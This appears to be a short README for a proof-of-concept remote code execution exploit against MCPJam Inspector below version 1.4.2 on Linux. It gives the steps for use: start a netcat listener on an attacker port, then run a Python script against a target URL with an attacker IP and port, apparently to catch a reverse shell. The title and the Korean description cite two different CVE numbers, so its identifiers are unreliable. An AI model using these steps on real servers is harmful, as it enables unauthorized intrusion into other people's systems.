
PoC for CVE-2025-49596 on linux targets
Linux 대상 MCPJam 인스펙터 1.4.2 미만에서 발생하는 CVE-2026-23744(RCE)용 자동화 PoC
# use netcat to run listener on any port like 9002.
nc -nvlp 9002
# use the automation like this
python3 CVE-2025-49596.py https://mcpjam-server.com <attacker-ip> <attacker-port>